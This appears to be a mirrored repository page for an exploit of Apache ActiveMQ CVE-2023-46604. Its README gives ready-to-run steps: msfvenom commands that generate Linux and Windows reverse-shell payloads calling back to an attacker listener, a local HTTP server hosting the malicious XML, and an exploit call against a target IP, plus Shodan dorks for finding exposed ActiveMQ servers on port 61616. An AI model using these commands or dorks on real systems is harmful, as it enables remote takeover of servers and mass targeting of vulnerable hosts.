# CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

**Repository Path**: bdtl/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

## Basic Information

- **Project Name**: CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
- **Description**: No description available
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: main
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2024-10-29
- **Last Updated**: 2024-10-29

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).

# Usage:
<b>Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.</b>

For Linux/Unix Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
```

For Windows Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml
```

![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/db1b82e4-55ef-4f23-9df7-8a0cf99c01c4)

# Shodan Dork:
- product:"ActiveMQ OpenWire Transport"
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/6d560881-7855-474b-8c8b-3fb5a3f09a94)
- product:"ActiveMQ OpenWire Transport" port:61616
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/1e073ec0-690e-40b1-bcc0-cb9390ca6b7c)



# Original Work:
- https://github.com/X1r0z/ActiveMQ-RCE

# For More Reading:
- https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
- https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

A special thanks to https://github.com/Anon4mous for actively supporting me.